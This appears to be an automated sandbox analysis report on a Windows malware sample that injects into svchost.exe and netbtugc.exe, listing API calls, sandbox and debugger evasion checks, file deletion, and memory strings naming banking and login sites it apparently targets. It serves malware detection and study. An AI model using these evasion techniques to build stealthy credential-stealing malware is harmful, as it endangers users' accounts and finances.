Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CBD1B0 push es; ret	4_2_00CBD1D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CA1126 push esp; ret	4_2_00CA1127
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CB550F pushad ; retf	4_2_00CB5510
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CBFEF5 push FFFFFFBAh; ret	4_2_00CBFEF7

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00B248D7
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00BA5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00BA5376

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B43187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00B43187

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\WBI835q8qr.exe	API/Special instruction interceptor: Address: D5F7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: WBI835q8qr.exe, 00000000.00000003.1404296237.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, WBI835q8qr.exe, 00000000.00000003.1404415690.0000000000DA1000.00000004.00000020.00020000.00000000.sdmp, WBI835q8qr.exe, 00000000.00000002.1429428557.0000000000DA1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: PROCMON.EXE3K

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0377096E rdtsc

2_2_0377096E

Source: C:\Windows\SysWOW64\netbtugc.exe	Window / User API: threadDelayed 2308			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Window / User API: threadDelayed 7663			Jump to behavior

Source: C:\Users\user\Desktop\WBI835q8qr.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2344	Thread sleep count: 2308 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2344	Thread sleep time: -4616000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2344	Thread sleep count: 7663 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2344	Thread sleep time: -15326000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe TID: 6892	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe TID: 6892	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe TID: 6892	Thread sleep time: -39000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B8445A
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8C6D1 FindFirstFileW,FindClose,	0_2_00B8C6D1
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B8C75C
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B8EF95
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B8F0F2
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B8F3F3
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B837EF
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B83B12
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B8BCBC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CBBAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_00CBBAB0

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B249A0

Source: F56GKLK7U4.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: F56GKLK7U4.4.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: F56GKLK7U4.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: netbtugc.exe, 00000004.00000002.3849311944.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
Source: F56GKLK7U4.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: F56GKLK7U4.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: zERAQEwgaCWL.exe, 00000008.00000002.3855504027.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.1859117052.000001D2F957C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: F56GKLK7U4.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: F56GKLK7U4.4.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: F56GKLK7U4.4.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: F56GKLK7U4.4.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\WBI835q8qr.exe

API call chain: ExitProcess graph end node

graph_0-104918

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0377096E rdtsc

2_2_0377096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417823 LdrLoadDll,

2_2_00417823

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B93F09 BlockInput,

0_2_00B93F09

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B23B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00B23B3A

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B55A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00B55A7C

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B24B37 LoadLibraryA,GetProcAddress,

0_2_00B24B37

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00D5E430 mov eax, dword ptr fs:[00000030h]	0_2_00D5E430
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00D5FAB0 mov eax, dword ptr fs:[00000030h]	0_2_00D5FAB0
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00D5FA50 mov eax, dword ptr fs:[00000030h]	0_2_00D5FA50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]	2_2_037D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]	2_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]	2_2_037D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]	2_2_0372C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]	2_2_03750310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]	2_2_037663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]	2_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]	2_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]	2_2_037EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]	2_2_037B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]	2_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]	2_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]	2_2_0372826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]	2_2_0372A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]	2_2_03736259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]	2_2_037EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]	2_2_037EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]	2_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]	2_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]	2_2_0372823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]	2_2_037402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]	2_2_037402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]	2_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]	2_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]	2_2_0372C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]	2_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]	2_2_03736154
